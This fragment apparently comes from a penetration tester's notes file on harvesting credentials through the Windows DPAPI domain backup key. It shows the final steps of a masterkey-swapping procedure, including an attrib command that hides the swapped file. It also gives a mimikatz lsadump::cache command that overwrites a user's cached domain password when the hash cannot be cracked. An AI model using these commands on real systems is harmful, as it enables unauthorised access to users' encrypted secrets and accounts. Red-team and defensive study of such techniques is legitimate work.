H3llKa1ser/B00t2R00t/Miscellaneous /Credential Harvesting/DPAPI Domain Backup Key.md

 #### 10) attrib "c:\users\USER\appdata\roaming\microsoft\protect\USER_SID\MASTERKEY" +S +H (Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one)

 #### 11) VOILA!

+## TIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz: lsadump::cache /user:USER /password:NEW_PASSWORD /kiwi